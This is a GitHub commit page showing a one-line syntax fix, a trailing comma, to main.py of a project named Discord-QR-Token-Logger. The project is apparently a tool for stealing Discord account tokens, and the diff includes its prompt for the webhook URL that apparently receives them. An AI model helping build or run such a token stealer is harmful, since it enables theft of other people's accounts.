Skip to content

Commit

Permalink
Update main.py
Browse files Browse the repository at this point in the history
  • Loading branch information
mouadessalim authored Jan 23, 2023
1 parent 1091fc7 commit 2908e6c
Showing 1 changed file with 1 addition and 1 deletion.
2 changes: 1 addition & 1 deletion Discord-QR-Token-Logger/main.py
Original file line number Diff line number Diff line change
Expand Up @@ -193,7 +193,7 @@ def window_state(_, item):
args=(
Write.Input("\n[*] Enter your webhook url -> ",
Colors.green_to_cyan,
interval=0.01)
interval=0.01),
))
elif (confir == NO) or (confir == NO.upper()):
th_main = Thread(target=main, args=(None,))
Expand Down

0 comments on commit 2908e6c

Please sign in to comment.